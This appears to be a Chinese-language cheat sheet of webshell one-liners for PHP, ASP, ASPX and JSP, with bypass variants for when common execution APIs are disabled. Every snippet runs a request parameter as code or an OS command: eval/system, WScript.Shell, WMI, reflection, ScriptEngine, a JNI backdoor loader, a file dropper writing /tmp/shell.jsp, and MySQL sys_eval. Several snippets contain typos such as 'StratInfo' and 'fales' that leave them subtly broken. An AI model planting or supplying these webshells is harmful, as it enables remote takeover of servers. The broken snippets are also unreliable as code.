PHP
php
<?php /* Executes request parameter 888 (GET, POST or cookie via $_REQUEST) as PHP source through eval(); the @ hides any parse or runtime error from the response. */ echo @eval($_REQUEST[888]); ?>
php
<?php /* Passes GET parameter 888 unmodified to system(); the command's output is written straight into the response. */ @system($_GET[888]); ?>
ASP
asp一句话
vbnet
<%' Page language directives: VBScript is the classic-ASP default and may be omitted, JScript has to be declared explicitly. %>
<% @Language=VBScript %> <%-- 默认的省略 --%>
<% @Language=JScript %> <%-- 必须标注 --%>
typescript
<%' Both forms hand the raw request value to the script engine as code; "cmd" and 777 are the parameter names a request-log review would look for. %>
<% eval request('cmd') %> //代码执行函数需要在前端传入 cmd=<% set ws=CreateObject(WScript.shell).exec('whoami'): Response.Write ws.StdOut.ReadAll() %>
<%execute request(777)%>
//该代码分为VBscript和JScript
typescript
<%' Spawns a process through WScript.Shell.exec with the "cmd" request parameter and writes its stdout into the response. %>
<% set wx=CreateObject("WScript.shell").exec(request("cmd")):Response.Write wx.StdOut.ReadAll() %>
比如
vbnet
<%/* JScript variant of the same thing: ActiveXObject("WScript.shell").exec runs request parameter 999 and echoes stdout. */%>
<% @Language=JScript %> //定义js版本的asp一句话
<% var a = new ActiveXObject(WScript.shell).exec(request(999));Response.Write(a.StdOut.ReadAll();) %>
CreateObject("WScript")被禁用
java
<%
' Fallback when WScript.Shell is unavailable: Shell.Application.ShellExecute launches cmd.exe with
' the "cmd" request parameter. Nothing is captured in memory; output only lands in the file named below.
On Error Resume Next
Set sa = CreateObject("Shell.Application")
' The trailing " > c:\temp\result.txt" redirect is the only output channel; last argument 0 is the window-show flag (hidden, per the API).
sa.ShellExecute "cmd.exe", "/c " & Request("cmd") & " > c:\temp\result.txt", "", "open", 0
' Err carries the failure only because On Error Resume Next suppressed it above.
If Err.Number = 0 Then
Response.Write "Command executed via Shell.Application"
Else
Response.Write "Shell.Application failed: " & Err.Description
End If
%>
java
<%
' Fallback that drives .NET's System.Diagnostics.Process from VBScript via COM activation
' (presumably requires the class to be COM-visible on the host — not verifiable from here).
On Error Resume Next
Set dotnet = CreateObject("System.Diagnostics.Process")
dotnet.StartInfo.FileName = "cmd.exe"
' The raw "cmd" request parameter becomes the argument string.
dotnet.StartInfo.Arguments = "/c " & Request("cmd")
' UseShellExecute must be False for RedirectStandardOutput to be honoured.
dotnet.StartInfo.UseShellExecute = False
dotnet.StartInfo.RedirectStandardOutput = True
dotnet.Start()
Response.Write dotnet.StandardOutput.ReadToEnd()
' Any error from the lines above was swallowed by On Error Resume Next and is only reported here.
If Err.Number <> 0 Then
Response.Write ".NET component failed"
End If
%>
ASPX
aspx一句话
typescript
<%@ page Language="c#" %>
<%-- Inline C# form: starts a process from the "cmd" request parameter; the ReadToEnd() result is never written to the response, so the caller sees no output. --%>
<% System.Diagnostics.Process.start("cmd.exe"+"/c "+Request['cmd']).StandardOutput.ReadToEnd(); %>
typescript
<%@ page Language="C#" %>
<script runat="server">
<%
// Runs on every page load: spawns cmd.exe with the "cmd" request parameter and writes its stdout back to the client.
void Page_Load(object sender, EventArgs e){
string cmd = Request["cmd"];
// A missing or empty parameter means no process is spawned at all.
if (!string.IsNullOrEmpty(cmd)){
var proc = System.Diagnostics.process();
proc.StratInfo.FileName = "cmd.exe";
proc.StratInfo.Argument = "/c " + cmd;
proc.StratInfo.UseShellExecute = false; // must be false: a shell-executed process cannot have its output redirected
proc.StratInfo.RedirectStandardOutput =true; // capture stdout in memory so it can be read below instead of going to the console
proc.StratInfo.RedirectStandardError = true; // stderr is captured as well, but note it is never read below
proc.Strat();
Response.Write(proc.StandardOutput.ReadToEnd());
}
}
%>
typescript
<%@ page Language="c#" %>
<%
// Same pattern without a Page_Load wrapper: cmd.exe /c <"cmd" parameter>, stdout echoed to the response.
var p = new System.Diagnostics.Process();
p.StratInfo.FileName = "cmd.exe";
p.StratInfo.Ageument = "/c "+ Request["cmd"];
// Shell execution is turned off so that standard output can be redirected.
p.StratInfo.UseShellExecute = fales;
p.StratInfo.RedirectStandardOutput = true;
p.start();
Response.Write(p.StandardOutput.ReadToEnd());
%>
System.Diagnostics.Process() 被禁用
java
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Management" %>
<%
// Fallback when System.Diagnostics.Process is blocked: creates the process through WMI (Win32_Process.Create).
// Output is not captured; only the new process id is echoed.
try {
string cmd = Request["cmd"];
ManagementClass processClass = new ManagementClass("Win32_Process");
ManagementBaseObject inParams = processClass.GetMethodParameters("Create");
// The entire command line is request-supplied; this string is what a process-creation audit would record.
inParams["CommandLine"] = "cmd.exe /c " + cmd;
ManagementBaseObject result = processClass.InvokeMethod("Create", inParams, null);
Response.Write("Process started with ID: " + result["ProcessId"]);
} catch (Exception e) {
Response.Write("WMI Error: " + e.Message);
}
%>
java
<%@ Page Language="C#" %>
<%
// Resolves Process.Start(string) by name at runtime, so the type is referenced only as a string literal.
// The "cmd" parameter is passed as the file name itself (no cmd.exe wrapper) and output is not captured.
try {
string cmd = Request["cmd"];
Type processType = Type.GetType("System.Diagnostics.Process");
System.Reflection.MethodInfo startMethod = processType.GetMethod("Start", new Type[] { typeof(string) });
// Static method, hence a null target; the returned Process object is never used.
object result = startMethod.Invoke(null, new object[] { cmd });
Response.Write("Reflection executed");
} catch (Exception e) {
Response.Write("Reflection Error: " + e.Message);
}
%>
jsp
jsp一句话
java
<%-- Minimal form: Runtime.exec on the raw "cmd" parameter; nothing is read back, so the caller gets no output. --%>
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
java
<%-- One-line form with output: Runtime.exec on the "cmd" parameter, stdout read line by line into the response. --%>
<%@ page import="java.io.*" %><% Process proc= Runtime.getRuntime().exec(request.getparameter("cmd")); BufferedReader r = new BufferedReader(new InputStreamReader(proc.getInputStream())); String line; while((line = r.readLine()) !=null){out.println(line);} %>
java
<%@ page import="java.io.*"%>
<%
// Runs the "cmd" parameter through /bin/sh -c, so shell metacharacters are interpreted, and streams stdout to the response.
String [] cmd ={"/bin/sh","-c",request.getParameter("cmd")};
Process proc = Runtime.getRuntime().exec(cmd);
BufferedReader r = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
// Only stdout is read; stderr is left unread and the process is never waited on.
while ((line = r.readLine())!= null){
out.println(line);
}
%>
java
<%@ page import="java.io.*" %>
<%
// Platform-aware variant: picks cmd /c or /bin/sh -c from os.name, then streams the command's stdout to the response.
String cmd = request.getParameter("cmd");
String os = System.getProperty("os.name").toLowerCase();
Process proc;
if (os.contains("win")) {
// Windows
proc = Runtime.getRuntime().exec(new String[]{"cmd", "/c", cmd});
} else {
// Linux/Unix
proc = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
}
BufferedReader reader = new BufferedReader(new InputStreamReader(proc.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
// The reader is closed, but the child process is not waited on or destroyed here.
reader.close();
%>
如果runtime被禁用 (面试常问)
java
<%@ page import="java.io.*" %>
<%
// ProcessBuilder instead of Runtime.exec; same /bin/sh -c execution of the "cmd" parameter.
try {
String cmd = request.getParameter("cmd");
ProcessBuilder pb = new ProcessBuilder("/bin/sh", "-c", cmd);
// Merges stderr into stdout, so the single read loop below also returns error text.
pb.redirectErrorStream(true);
Process p = pb.start();
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
} catch (Exception e) {
out.println("ProcessBuilder Error: " + e.getMessage());
}
%>
java
<%@ page import="javax.script.*" %>
<%
// Indirection through the JSR-223 script engine: the "cmd" parameter is concatenated into a JavaScript
// string that calls Runtime.exec, so the Java source never calls Runtime directly. Output is not captured.
try {
ScriptEngineManager manager = new ScriptEngineManager();
// Returns null when no JavaScript engine is bundled (newer JDKs dropped Nashorn); the NPE then lands in the catch below.
ScriptEngine engine = manager.getEngineByName("javascript");
String jsCode = "java.lang.Runtime.getRuntime().exec('" + request.getParameter("cmd") + "')";
engine.eval(jsCode);
out.println("JS executed");
} catch (Exception e) {
out.println("ScriptEngine Error: " + e.getMessage());
}
%>
java
<%@ page import="java.lang.reflect.*" %>
<%
// Reflection variant: Runtime is resolved by class name and exec(String) by method name, so neither
// appears as a direct call in the source; stdout of the spawned process is streamed to the response.
try {
Class rt = Class.forName("java.lang.Runtime");
Method getRuntime = rt.getMethod("getRuntime");
// Static method, hence a null receiver.
Object runtime = getRuntime.invoke(null);
Method exec = rt.getMethod("exec", String.class);
Process p = (Process) exec.invoke(runtime, request.getParameter("cmd"));
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line;
while ((line = reader.readLine()) != null) {
out.println(line);
}
} catch (Exception e) {
out.println("Reflection Error: " + e.getMessage());
}
%>
java
<%@ page import="java.nio.file.*" %>
<%
// Native-code path: loads a shared library from a fixed path via System.load. The library has to
// already exist on disk, so a file-write (see the FileWriter snippet) or upload would precede this.
try {
// Loads the native library through JNI (must be staged beforehand)
System.load("/tmp/backdoor.so");
out.println("JNI loaded");
} catch (Exception e) {
out.println("JNI Error: " + e.getMessage());
}
%>
java
<%@ page import="java.io.*" %>
<%
// File dropper rather than a command runner: whatever arrives in the "file" parameter is written
// verbatim to a fixed path. A web-root or /tmp write from the servlet process is the signal here.
try {
String content = request.getParameter("file");
if (content != null) {
// Write the request body out as a JSP file
FileWriter fw = new FileWriter("/tmp/shell.jsp");
fw.write(content);
fw.close();
out.println("File written");
}
} catch (Exception e) {
out.println("File Error: " + e.getMessage());
}
%>
java
<%@ page import="java.sql.*" %>
<%
// Executes through the database instead of the JVM: relies on a sys_eval UDF being installed in MySQL
// (not part of a stock server — the author's own "if supported" caveat) and on hard-coded root credentials.
try {
Class.forName("com.mysql.jdbc.Driver");
// Credentials are embedded in the page; the connection is never closed.
Connection conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/test", "root", "password");
Statement stmt = conn.createStatement();
// Runs the command through the database, if the UDF is available; the "cmd" parameter is concatenated straight into the SQL text.
ResultSet rs = stmt.executeQuery("SELECT sys_eval('" + request.getParameter("cmd") + "')");
if (rs.next()) {
out.println(rs.getString(1));
}
} catch (Exception e) {
out.println("DB Error: " + e.getMessage());
}
%>